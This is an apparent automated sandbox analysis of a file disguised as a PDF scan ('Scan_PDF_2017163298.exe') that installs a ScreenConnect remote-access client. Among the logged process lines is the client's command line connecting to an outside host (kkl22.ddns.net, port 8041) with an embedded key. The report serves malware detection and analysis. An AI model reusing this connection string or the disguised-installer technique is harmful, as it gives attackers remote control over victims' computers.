                              Source: rundll32.exe, 00000005.00000003.1362200209.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1362019371.000000000507B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1362019371.000000000500C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                              Source: rundll32.exe, 00000005.00000003.1362200209.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1362019371.000000000507B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1362019371.000000000500C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drString found in binary or memory: http://wixtoolset.org/news/
                              Source: rundll32.exe, 00000005.00000003.1362200209.0000000004F03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1362019371.000000000507B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1362019371.000000000500C000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: Scan_PDF_2017163298.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.3.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.3.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnectJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: initial sampleStatic PE information: Filename: Scan_PDF_2017163298.exe
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_05872760 CreateProcessAsUserW,8_2_05872760
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5096eb.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI996C.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI998C.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI9EDC.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5096ed.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5096ed.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{F5B2D29D-B6F2-4925-5CB0-E8E8EA89431D}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\uoybbna4.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\uoybbna4.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI998C.tmpJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05A86F200_2_05A86F20
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05A89F200_2_05A89F20
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05A8EEE00_2_05A8EEE0
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05A860E00_2_05A860E0
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05A86F100_2_05A86F10
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeCode function: 0_2_05AA039B0_2_05AA039B
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_0116D5A88_2_0116D5A8
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_058700408_2_05870040
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeCode function: 8_2_058700408_2_05870040
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C370BA9_2_00007FF886C370BA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C669399_2_00007FF886C66939
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C6DCD39_2_00007FF886C6DCD3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C6DCAF9_2_00007FF886C6DCAF
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886C6399D9_2_00007FF886C6399D
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F460449_2_00007FF886F46044
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F45E319_2_00007FF886F45E31
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F401D09_2_00007FF886F401D0
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F46C789_2_00007FF886F46C78
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F42C8B9_2_00007FF886F42C8B
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F464EB9_2_00007FF886F464EB
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F462599_2_00007FF886F46259
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FF886F45EDB9_2_00007FF886F45EDB
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886C370BA10_2_00007FF886C370BA
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886C310CF10_2_00007FF886C310CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886C310D710_2_00007FF886C310D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F4F48210_2_00007FF886F4F482
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F470F310_2_00007FF886F470F3
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F45F1610_2_00007FF886F45F16
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F42B6510_2_00007FF886F42B65
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F4079010_2_00007FF886F40790
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F4E6D610_2_00007FF886F4E6D6
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF886F4305110_2_00007FF886F43051
                              Source: Scan_PDF_2017163298.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_2017163298.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_2017163298.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_2017163298.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_2017163298.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1365528966.0000000005C6C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1365528966.0000000005C6C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1365528966.0000000005C6C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1365528966.0000000005C6C000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.000000000086F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.000000000086F000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1367618256.0000000006CA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1367618256.0000000006CA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1367618256.0000000006CA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1363492041.0000000005680000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1363623483.00000000057B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000000.1335059252.0000000000346000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1345732366.0000000001570000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1373576942.0000000007D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1373576942.0000000007D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exeX vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1363945244.0000000005840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1363945244.0000000005840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exe, 00000000.00000002.1363945244.0000000005840000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenamezlib.dll2 vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenamewixca.dll\ vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs Scan_PDF_2017163298.exe
                              Source: Scan_PDF_2017163298.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.2.Scan_PDF_2017163298.exe.5840000.6.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.2.Scan_PDF_2017163298.exe.5840000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.Scan_PDF_2017163298.exe.5840000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.Scan_PDF_2017163298.exe.5840000.6.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.0.Scan_PDF_2017163298.exe.3cc3d8.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1450850062.0000000000D88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
                              Source: classification engineClassification label: mal42.troj.evad.winEXE@18/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)Jump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan_PDF_2017163298.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: Scan_PDF_2017163298.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: Scan_PDF_2017163298.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9390.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5280796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: Scan_PDF_2017163298.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: Scan_PDF_2017163298.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeFile read: C:\Users\user\Desktop\Scan_PDF_2017163298.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Scan_PDF_2017163298.exe "C:\Users\user\Desktop\Scan_PDF_2017163298.exe"
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F709E0C1738E8A53DFEDA48789872001 C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9390.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5280796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 44B43403CFD66C9CC500A14417CF0426
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E44ABF9CE7CBB19DDF57A0D6AD3151E3 E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=kkl22.ddns.net&p=8041&s=478e82c1-db06-42e2-b73b-60fd80c17bc4&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=scan_pdf&c=windows%20pdf%20viewer&c=scan_pdf&c=scan_pdf&c=scan_pdf&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "600c2429-3619-41f2-bc1a-bc0ec60c72d7" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "be73d786-925b-47a5-99df-a44cdbf0e1aa" "System"
                              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                              Source: C:\Users\user\Desktop\Scan_PDF_2017163298.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F709E0C1738E8A53DFEDA48789872001 CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 44B43403CFD66C9CC500A14417CF0426Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E44ABF9CE7CBB19DDF57A0D6AD3151E3 E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI9390.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5280796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "600c2429-3619-41f2-bc1a-bc0ec60c72d7" "User"Jump to behavior
